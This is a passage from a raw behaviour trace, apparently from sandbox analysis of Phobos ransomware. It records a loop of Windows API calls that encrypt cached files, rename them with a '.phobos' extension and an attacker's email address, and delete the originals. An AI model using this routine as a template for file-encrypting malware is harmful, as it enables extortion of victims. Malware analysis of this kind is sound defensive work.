nNumberOfBytesToWrite=0x650, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x650, lpOverlapped=0x0) returned 1 [0196.254] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f89c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f908 | out: phKey=0x2e0f908*=0xa32a28) returned 1 [0196.254] CryptSetKeyParam (hKey=0xa32a28, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0196.254] CryptEncrypt (in: hKey=0xa32a28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0xb0, dwBufLen=0xb0 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0xb0) returned 1 [0196.254] CryptDestroyKey (hKey=0xa32a28) returned 1 [0196.254] WriteFile (in: hFile=0x124, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x162, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x162, lpOverlapped=0x0) returned 1 [0196.254] CryptDestroyKey (hKey=0xa327e8) returned 1 [0196.254] CloseHandle (hObject=0x194) returned 1 [0196.254] CloseHandle (hObject=0x124) returned 1 [0196.254] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\705A76DE71EA2CAEBB8F0907449CE086_9752C5B2D53EE7A19F7764B52968EC21" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\705a76de71ea2caebb8f0907449ce086_9752c5b2d53ee7a19f7764b52968ec21")) returned 1 [0196.255] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0196.255] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8059E9A0D314877E40FE93D8CCFB3C69_234CB5D64705D4DBB4DA839716359AF0" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\8059e9a0d314877e40fe93d8ccfb3c69_234cb5d64705d4dbb4da839716359af0"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x124 [0196.255] GetFileSizeEx (in: hFile=0x124, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=463) returned 1 [0196.255] CloseHandle (hObject=0x124) returned 1 [0196.255] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8059E9A0D314877E40FE93D8CCFB3C69_234CB5D64705D4DBB4DA839716359AF0" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\8059e9a0d314877e40fe93d8ccfb3c69_234cb5d64705d4dbb4da839716359af0")) returned 0x2024 [0196.255] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8059E9A0D314877E40FE93D8CCFB3C69_234CB5D64705D4DBB4DA839716359AF0.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\8059e9a0d314877e40fe93d8ccfb3c69_234cb5d64705d4dbb4da839716359af0.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0196.256] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8059E9A0D314877E40FE93D8CCFB3C69_234CB5D64705D4DBB4DA839716359AF0" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\8059e9a0d314877e40fe93d8ccfb3c69_234cb5d64705d4dbb4da839716359af0"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x124 [0196.256] SetFilePointerEx (in: hFile=0x124, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0196.256] SetFilePointerEx (in: hFile=0x124, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0196.256] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8059E9A0D314877E40FE93D8CCFB3C69_234CB5D64705D4DBB4DA839716359AF0.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\8059e9a0d314877e40fe93d8ccfb3c69_234cb5d64705d4dbb4da839716359af0.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0196.256] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f8a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f904 | out: phKey=0x2e0f904*=0xa327e8) returned 1 [0196.256] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0196.256] ReadFile (in: hFile=0x124, lpBuffer=0x3070020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2e0f92c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2e0f92c*=0x1cf, lpOverlapped=0x0) returned 1 [0196.258] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x1d0, dwBufLen=0x1d0 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x1d0) returned 1 [0196.258] WriteFile (in: hFile=0x194, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x1d0, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x1d0, lpOverlapped=0x0) returned 1 [0196.258] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f89c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f908 | out: phKey=0x2e0f908*=0xa32a28) returned 1 [0196.258] CryptSetKeyParam (hKey=0xa32a28, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0196.258] CryptEncrypt (in: hKey=0xa32a28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0xb0, dwBufLen=0xb0 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0xb0) returned 1 [0196.258] CryptDestroyKey (hKey=0xa32a28) returned 1 [0196.258] WriteFile (in: hFile=0x194, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x162, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x162, lpOverlapped=0x0) returned 1 [0196.259] CryptDestroyKey (hKey=0xa327e8) returned 1 [0196.259] CloseHandle (hObject=0x124) returned 1 [0196.259] CloseHandle (hObject=0x194) returned 1 [0196.259] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8059E9A0D314877E40FE93D8CCFB3C69_234CB5D64705D4DBB4DA839716359AF0" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\8059e9a0d314877e40fe93d8ccfb3c69_234cb5d64705d4dbb4da839716359af0")) returned 1 [0196.259] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0196.260] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8059E9A0D314877E40FE93D8CCFB3C69_294110D6990EE392327F8A606D55BC1E" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\8059e9a0d314877e40fe93d8ccfb3c69_294110d6990ee392327f8a606d55bc1e"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0196.260] GetFileSizeEx (in: hFile=0x194, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=463) returned 1 [0196.260] CloseHandle (hObject=0x194) returned 1 [0196.260] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8059E9A0D314877E40FE93D8CCFB3C69_294110D6990EE392327F8A606D55BC1E" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\8059e9a0d314877e40fe93d8ccfb3c69_294110d6990ee392327f8a606d55bc1e")) returned 0x2024 [0196.260] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8059E9A0D314877E40FE93D8CCFB3C69_294110D6990EE392327F8A606D55BC1E.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\8059e9a0d314877e40fe93d8ccfb3c69_294110d6990ee392327f8a606d55bc1e.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0196.260] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8059E9A0D314877E40FE93D8CCFB3C69_294110D6990EE392327F8A606D55BC1E" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\8059e9a0d314877e40fe93d8ccfb3c69_294110d6990ee392327f8a606d55bc1e"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0196.260] SetFilePointerEx (in: hFile=0x194, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0196.260] SetFilePointerEx (in: hFile=0x194, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0196.260] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8059E9A0D314877E40FE93D8CCFB3C69_294110D6990EE392327F8A606D55BC1E.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\8059e9a0d314877e40fe93d8ccfb3c69_294110d6990ee392327f8a606d55bc1e.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x124 [0196.262] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f8a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f904 | out: phKey=0x2e0f904*=0xa327e8) returned 1 [0196.262] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0196.262] ReadFile (in: hFile=0x194, lpBuffer=0x3070020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2e0f92c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2e0f92c*=0x1cf, lpOverlapped=0x0) returned 1 [0196.265] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x1d0, dwBufLen=0x1d0 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x1d0) returned 1 [0196.265] WriteFile (in: hFile=0x124, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x1d0, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x1d0, lpOverlapped=0x0) returned 1 [0196.266] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f89c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f908 | out: phKey=0x2e0f908*=0xa32a28) returned 1 [0196.266] CryptSetKeyParam (hKey=0xa32a28, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0196.266] CryptEncrypt (in: hKey=0xa32a28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0xb0, dwBufLen=0xb0 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0xb0) returned 1 [0196.266] CryptDestroyKey (hKey=0xa32a28) returned 1 [0196.266] WriteFile (in: hFile=0x124, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x162, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x162, lpOverlapped=0x0) returned 1 [0196.266] CryptDestroyKey (hKey=0xa327e8) returned 1 [0196.266] CloseHandle (hObject=0x194) returned 1 [0196.266] CloseHandle (hObject=0x124) returned 1 [0196.266] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8059E9A0D314877E40FE93D8CCFB3C69_294110D6990EE392327F8A606D55BC1E" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\8059e9a0d314877e40fe93d8ccfb3c69_294110d6990ee392327f8a606d55bc1e")) returned 1 [0196.267] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0196.267] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8059E9A0D314877E40FE93D8CCFB3C69_50167909FCFE0C66153F1901439CBBA1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\8059e9a0d314877e40fe93d8ccfb3c69_50167909fcfe0c66153f1901439cbba1"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x124 [0196.268] GetFileSizeEx (in: hFile=0x124, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=463) returned 1 [0196.268] CloseHandle (hObject=0x124) returned 1 [0196.268] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8059E9A0D314877E40FE93D8CCFB3C69_50167909FCFE0C66153F1901439CBBA1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\8059e9a0d314877e40fe93d8ccfb3c69_50167909fcfe0c66153f1901439cbba1")) returned 0x2024 [0196.268] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8059E9A0D314877E40FE93D8CCFB3C69_50167909FCFE0C66153F1901439CBBA1.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\8059e9a0d314877e40fe93d8ccfb3c69_50167909fcfe0c66153f1901439cbba1.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0196.268] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8059E9A0D314877E40FE93D8CCFB3C69_50167909FCFE0C66153F1901439CBBA1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\8059e9a0d314877e40fe93d8ccfb3c69_50167909fcfe0c66153f1901439cbba1"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x124 [0196.268] SetFilePointerEx (in: hFile=0x124, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0196.268] SetFilePointerEx (in: hFile=0x124, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0196.268] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8059E9A0D314877E40FE93D8CCFB3C69_50167909FCFE0C66153F1901439CBBA1.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\8059e9a0d314877e40fe93d8ccfb3c69_50167909fcfe0c66153f1901439cbba1.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0196.268] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f8a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f904 | out: phKey=0x2e0f904*=0xa327e8) returned 1 [0196.268] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0196.269] ReadFile (in: hFile=0x124, lpBuffer=0x3070020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2e0f92c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2e0f92c*=0x1cf, lpOverlapped=0x0) returned 1 [0196.269] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x1d0, dwBufLen=0x1d0 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x1d0) returned 1 [0196.269] WriteFile (in: hFile=0x194, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x1d0, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x1d0, lpOverlapped=0x0) returned 1 [0196.270] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f89c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f908 | out: phKey=0x2e0f908*=0xa32a28) returned 1 [0196.270] CryptSetKeyParam (hKey=0xa32a28, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0196.270] CryptEncrypt (in: hKey=0xa32a28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0xb0, dwBufLen=0xb0 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0xb0) returned 1 [0196.270] CryptDestroyKey (hKey=0xa32a28) returned 1 [0196.270] WriteFile (in: hFile=0x194, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x162, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x162, lpOverlapped=0x0) returned 1 [0196.270] CryptDestroyKey (hKey=0xa327e8) returned 1 [0196.270] CloseHandle (hObject=0x124) returned 1 [0196.271] CloseHandle (hObject=0x194) returned 1 [0196.271] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8059E9A0D314877E40FE93D8CCFB3C69_50167909FCFE0C66153F1901439CBBA1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\8059e9a0d314877e40fe93d8ccfb3c69_50167909fcfe0c66153f1901439cbba1")) returned 1 [0196.271] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0196.271] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8059E9A0D314877E40FE93D8CCFB3C69_581C904DB5924E46A6C1A8637614A40E" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\8059e9a0d314877e40fe93d8ccfb3c69_581c904db5924e46a6c1a8637614a40e"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0196.272] GetFileSizeEx (in: hFile=0x194, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=463) returned 1 [0196.272] CloseHandle (hObject=0x194) returned 1 [0196.272] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8059E9A0D314877E40FE93D8CCFB3C69_581C904DB5924E46A6C1A8637614A40E" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\8059e9a0d314877e40fe93d8ccfb3c69_581c904db5924e46a6c1a8637614a40e")) returned 0x2024 [0196.272] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8059E9A0D314877E40FE93D8CCFB3C69_581C904DB5924E46A6C1A8637614A40E.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\8059e9a0d314877e40fe93d8ccfb3c69_581c904db5924e46a6c1a8637614a40e.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0196.272] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8059E9A0D314877E40FE93D8CCFB3C69_581C904DB5924E46A6C1A8637614A40E" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\8059e9a0d314877e40fe93d8ccfb3c69_581c904db5924e46a6c1a8637614a40e"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0196.272] SetFilePointerEx (in: hFile=0x194, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0196.272] SetFilePointerEx (in: hFile=0x194, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0196.272] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8059E9A0D314877E40FE93D8CCFB3C69_581C904DB5924E46A6C1A8637614A40E.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\8059e9a0d314877e40fe93d8ccfb3c69_581c904db5924e46a6c1a8637614a40e.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x124 [0196.273] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f8a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f904 | out: phKey=0x2e0f904*=0xa327e8) returned 1 [0196.273] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0196.273] ReadFile (in: hFile=0x194, lpBuffer=0x3070020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2e0f92c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2e0f92c*=0x1cf, lpOverlapped=0x0) returned 1 [0196.273] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x1d0, dwBufLen=0x1d0 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x1d0) returned 1 [0196.274] WriteFile (in: hFile=0x124, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x1d0, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x1d0, lpOverlapped=0x0) returned 1 [0196.274] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f89c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f908 | out: phKey=0x2e0f908*=0xa32a28) returned 1 [0196.274] CryptSetKeyParam (hKey=0xa32a28, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0196.274] CryptEncrypt (in: hKey=0xa32a28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0xb0, dwBufLen=0xb0 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0xb0) returned 1 [0196.274] CryptDestroyKey (hKey=0xa32a28) returned 1 [0196.274] WriteFile (in: hFile=0x124, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x162, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x162, lpOverlapped=0x0) returned 1 [0196.275] CryptDestroyKey (hKey=0xa327e8) returned 1 [0196.275] CloseHandle (hObject=0x194) returned 1 [0196.275] CloseHandle (hObject=0x124) returned 1 [0196.275] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8059E9A0D314877E40FE93D8CCFB3C69_581C904DB5924E46A6C1A8637614A40E" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\8059e9a0d314877e40fe93d8ccfb3c69_581c904db5924e46a6c1a8637614a40e")) returned 1 [0196.275] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0196.276] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8059E9A0D314877E40FE93D8CCFB3C69_5EA65844B9EF5670A9C002CBD85B10A4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\8059e9a0d314877e40fe93d8ccfb3c69_5ea65844b9ef5670a9c002cbd85b10a4"), 